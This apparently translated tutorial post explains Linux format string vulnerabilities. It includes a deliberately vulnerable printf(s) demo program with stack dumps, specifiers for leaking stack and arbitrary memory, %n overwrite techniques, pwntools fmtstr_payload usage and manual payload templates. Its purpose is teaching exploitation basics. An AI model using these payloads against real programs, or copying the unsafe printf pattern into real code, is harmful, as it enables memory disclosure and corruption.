linux format string vulnerability

Posted by cherubrock74 on Fri, 04 Feb 2022 13:15:19 +0100

format string vulnerability

Introduction to formatting strings

Common formatting string functions

functionBasic introduction
printfOutput to stdout
fprintfOutput to the specified FILE stream
vprintfFormat the output to stdout according to the parameter list
vfprintfFormat the output to the FILE stream according to the parameter list
sprintfOutput to string
snprintfOutput the specified number of bytes to the string
vsprintfFormat the output to the string according to the parameter list
vsnprintfFormat and output the specified byte to the string according to the parameter list

Common format string form

%[parameter][flags][field width][.precision][length]type
  • Parameter: n $, get the specified parameter in the format string
  • field width: the minimum width of the output
  • precision: the maximum length of the output
  • Length, the length of the output
    • hh, output a byte
    • h. Output a double byte
  • type
    • d/i, signed integer
    • u. Unsigned integer
    • X / x, hexadecimal
    • o. Octal
    • s. All bytes
    • c. char type single character
    • p. void * type, output the value of the corresponding variable. Printf ('% p', a) prints the value of variable a in the format of address, and printf ('% p', & A) prints the address of variable a.
    • n. Do not output characters, but write the number of characters that have been successfully output to the variable indicated by the corresponding integer pointer parameter.

Principle verification

Sample program:

#include<stdio.h>

int main() {
    char s[100] = "aaaa.%p.%p.%p.%p.%p.%p.%p";
    printf(s);
    return 0;
}

32 bit

Compile command:

gcc test.c -g -m32 -o test

Output result:

aaaa.0xf7ffc988.0xffffcf2a.0x56555595.0xffffcf2a.0xf7ffc984.0x61616161.0x2e70252e

Stack structure:

00:0000│ esp  0xffffcee0 —▸ 0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
01:0004│      0xffffcee4 —▸ 0xf7ffc988 (_rtld_global_ro+136) ◂— 0x8e
02:0008│      0xffffcee8 —▸ 0xffffcf2a ◂— 0x0
03:000c│      0xffffceec —▸ 0x56555595 (main+24) ◂— add    ebx, 0x1a3f
04:0010│      0xffffcef0 —▸ 0xffffcf2a ◂— 0x0
05:0014│      0xffffcef4 —▸ 0xf7ffc984 (_rtld_global_ro+132) ◂— 0x6
06:0018│ eax  0xffffcef8 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'

From top to bottom, there are parameters 0 ~ 6. Parameter 0 is the address of the format string, and the first 4 bytes of the format string are used as parameter 6 (depending on the situation due to different stack structure). Therefore, if the appropriate position of the format string is set as the target address, the data of the address can be operated.

64 bit

Compile command:

gcc test.c -g -m64 -o test

Output result:

aaaa.0x7fffffffde78.0x70.0x555555554770.0x7ffff7dced80.0x7ffff7dced80.0x2e70252e61616161.0x70252e70252e7025

Register:

 RAX  0x0
 RBX  0x0
 RCX  0x555555554770 (__libc_csu_init) ◂— push   r15
 RDX  0x70
 RDI  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
 RSI  0x7fffffffde78 —▸ 0x7fffffffe21b
 R8   0x7ffff7dced80 (initial) ◂— 0x0
 R9   0x7ffff7dced80 (initial) ◂— 0x0
 R10  0x0
 R11  0x0
 R12  0x5555555545a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffde70 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffdd90 —▸ 0x555555554770 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
 RIP  0x555555554747 (main+157) ◂— call   0x555555554580

Stack structure:

00:0000│ rdi rsp  0x7fffffffdd20 ◂— 'aaaa.%p.%p.%p.%p.%p.%p.%p'
01:0008│          0x7fffffffdd28 ◂— '%p.%p.%p.%p.%p.%p'
02:0010│          0x7fffffffdd30 ◂— '.%p.%p.%p'
03:0018│          0x7fffffffdd38 ◂— 0x70 /* 'p' */
04:0020│          0x7fffffffdd40 ◂— 0x0

Since the 64 bit program first uses the rdi, rsi, rdx, rcx, r8 and r9 registers as the first six parameters of the function parameters, and the redundant parameters will be pressed on the stack in turn, the first six outputs are the values in the registers (aaaa is regarded as the format string parameters), and the first eight bytes of the format string are regarded as parameter 6.

Leak memory

Leak stack variable memory

Divulge the value of stack variable

Get stack is treated as the second n + 1 n+1 Value of n+1 Parameters:% n$x

Note:% x is actually the hexadecimal output of% d, corresponding to 32 bits, that is, 4 bytes; Under 64 bit operating system, only the last 32 bits of the partition will be truncated;% There is no problem with the association between P and system bits, so it is recommended to use% p.

Disclose the contents of the address corresponding to the stack variable

Get stack is treated as the second n + 1 n+1 Content of address corresponding to n+1 Parameters:% n$s

Leak arbitrary address memory

Get the value corresponding to the address addr (addr is the k-th parameter): addr%k$s

Overwrite memory

Note: overwriting memory can only cover the memory corresponding to an address, not the first few parameters. For the program that starts ASLR, the stack address should be disclosed in advance when overwriting a value on the stack.

pwntools generate payload

For the format string payload, pwntools also provides a class Fmtstr that can be used directly. For details, see http://docs.pwntools.com/en/stable/fmtstr.html , the functions we use more often are

fmtstr_payload(offset, {address:data}, numbwritten=0, write_size='byte')
  • Offset indicates the offset of the format string
  • Numbwriten indicates the number of characters that have been output
  • write_size indicates the writing method, whether by byte, short or int, corresponding to hhn, hn and n. the default value is byte, that is, write by hhn.

Note: some problems will limit the time and cause the payload generated by pwntools to become invalid. Generally, this kind of problem can reduce the output length by modifying only the low address. At this time, it is necessary to manually construct the payload.

Manually construct a payload

Covering small numbers

For numbers less than the machine word length, if you put the address in front of the formatted string, the number of characters output will be greater than the size of the number, so you should put the address after it.

Take the number 2 as an example: aa%k$n[padding][addr]

Covering large numbers

It takes too long to directly output large numbers of bytes at one time for coverage. Therefore, it is necessary to split the large numbers into several parts for coverage respectively. For example, hhn is written in bytes or hn is written in double words.

Take the number of 32 bits written by hhn as an example. The form of payload is: [addr][addr+1][addr+2][addr+3][pad1]%k$hhn[pad2]%(k+1)$hhn[pad3]%(k+2)$hhn[pad4]%(k+3)$hhn

Topics: Linux Operation & Maintenance server